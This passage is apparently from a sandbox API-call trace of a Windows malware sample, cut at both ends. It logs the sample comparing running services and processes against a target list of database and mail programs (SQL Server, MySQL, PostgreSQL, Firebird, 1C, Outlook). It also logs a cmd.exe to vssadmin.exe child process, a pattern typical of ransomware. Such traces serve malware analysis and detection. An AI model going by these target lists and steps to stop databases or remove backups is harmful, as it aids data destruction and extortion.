lpString2="Themes") returned -1 [0047.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0047.270] lstrlenW (lpString="TrkWks") returned 6 [0047.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0047.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0047.270] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0047.270] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0047.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0047.270] lstrlenW (lpString="UxSms") returned 5 [0047.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0047.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0047.270] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0047.270] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0047.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0047.271] lstrlenW (lpString="VSS") returned 3 [0047.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0047.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0047.271] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0047.271] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0047.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0047.271] lstrlenW (lpString="WdiServiceHost") returned 14 [0047.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0047.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0047.271] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0047.271] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0047.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0047.271] lstrlenW (lpString="WdiSystemHost") returned 13 [0047.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0047.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0047.271] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0047.271] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0047.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0047.271] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0047.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0047.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0047.271] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0047.271] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0047.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0047.271] lstrlenW (lpString="Winmgmt") returned 7 [0047.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0047.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0047.271] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0047.271] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0047.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0047.271] lstrlenW (lpString="WPDBusEnum") returned 10 [0047.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0047.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0047.272] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0047.272] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0047.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0047.272] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3800fb0 | out: hHeap=0x5f0000) returned 1 [0047.272] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x174 [0047.274] Process32FirstW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0047.275] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0047.275] lstrlenW (lpString="System") returned 6 [0047.275] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0047.275] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0047.275] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0047.275] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0047.275] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0047.275] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0047.276] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0047.276] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0047.280] lstrlenW (lpString="smss.exe") returned 8 [0047.280] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0047.280] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0047.280] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0047.280] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0047.280] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0047.280] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0047.280] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0047.280] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.281] lstrlenW (lpString="csrss.exe") returned 9 [0047.281] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0047.281] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0047.281] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0047.281] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0047.281] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0047.281] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0047.281] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0047.281] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0047.282] lstrlenW (lpString="wininit.exe") returned 11 [0047.282] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0047.282] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0047.282] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0047.282] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.283] lstrlenW (lpString="csrss.exe") returned 9 [0047.283] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0047.283] lstrlenW (lpString="winlogon.exe") returned 12 [0047.283] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0047.284] lstrlenW (lpString="services.exe") returned 12 [0047.284] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0047.285] lstrlenW (lpString="lsass.exe") returned 9 [0047.285] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0047.286] lstrlenW (lpString="lsm.exe") returned 7 [0047.286] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.286] lstrlenW (lpString="svchost.exe") returned 11 [0047.286] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.287] lstrlenW (lpString="svchost.exe") returned 11 [0047.287] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.288] lstrlenW (lpString="svchost.exe") returned 11 [0047.288] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.288] lstrlenW (lpString="svchost.exe") returned 11 [0047.288] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.289] lstrlenW (lpString="svchost.exe") returned 11 [0047.289] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0047.290] lstrlenW (lpString="audiodg.exe") returned 11 [0047.290] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.290] lstrlenW (lpString="svchost.exe") returned 11 [0047.290] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.291] lstrlenW (lpString="svchost.exe") returned 11 [0047.291] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0047.292] lstrlenW (lpString="dwm.exe") returned 7 [0047.292] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0047.293] lstrlenW (lpString="explorer.exe") returned 12 [0047.293] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0047.293] lstrlenW (lpString="spoolsv.exe") returned 11 [0047.293] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0047.294] lstrlenW (lpString="taskhost.exe") returned 12 [0047.294] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.295] lstrlenW (lpString="svchost.exe") returned 11 [0047.295] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0047.295] lstrlenW (lpString="taskeng.exe") returned 11 [0047.295] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0047.296] lstrlenW (lpString="taskhost.exe") returned 12 [0047.296] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0047.297] lstrlenW (lpString="entrepreneur.exe") returned 16 [0047.297] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0047.357] lstrlenW (lpString="andrew kinds.exe") returned 16 [0047.357] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0047.357] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0047.358] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0047.358] lstrlenW (lpString="educated.exe") returned 12 [0047.358] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0047.359] lstrlenW (lpString="servers.exe") returned 11 [0047.359] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0047.360] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0047.360] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0047.361] lstrlenW (lpString="gbp_chair.exe") returned 13 [0047.361] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0047.361] lstrlenW (lpString="attention infected.exe") returned 22 [0047.361] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0047.362] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0047.362] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0047.363] lstrlenW (lpString="pattern amateur.exe") returned 19 [0047.363] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0047.364] lstrlenW (lpString="referral.exe") returned 12 [0047.364] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0047.364] lstrlenW (lpString="copyingseems.exe") returned 16 [0047.364] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0047.365] lstrlenW (lpString="spin generally.exe") returned 18 [0047.365] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0047.366] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0047.366] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0047.367] lstrlenW (lpString="transmit.exe") returned 12 [0047.367] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0047.367] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0047.367] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0047.368] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0047.368] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0047.369] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0047.369] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0047.369] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0047.370] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0047.370] lstrlenW (lpString="delight.exe") returned 11 [0047.370] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0047.371] lstrlenW (lpString="within enquiry.exe") returned 18 [0047.371] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0047.372] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0047.372] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0047.372] lstrlenW (lpString="agent1c.exe") returned 11 [0047.373] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0047.373] lstrlenW (lpString="cmd.exe") returned 7 [0047.373] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.374] lstrlenW (lpString="conhost.exe") returned 11 [0047.374] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0047.375] lstrlenW (lpString="vssadmin.exe") returned 12 [0047.375] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0047.375] lstrlenW (lpString="VSSVC.exe") returned 9 [0047.375] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.376] lstrlenW (lpString="svchost.exe") returned 11 [0047.376] Process32NextW (in: hSnapshot=0x174, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0047.377] CloseHandle (hObject=0x174) returned 1 [0047.377] Sleep (dwMilliseconds=0x1f4) [0048.048] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x37208a8 [0048.048] EnumServicesStatusExW (in: hSCManager=0x37208a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: 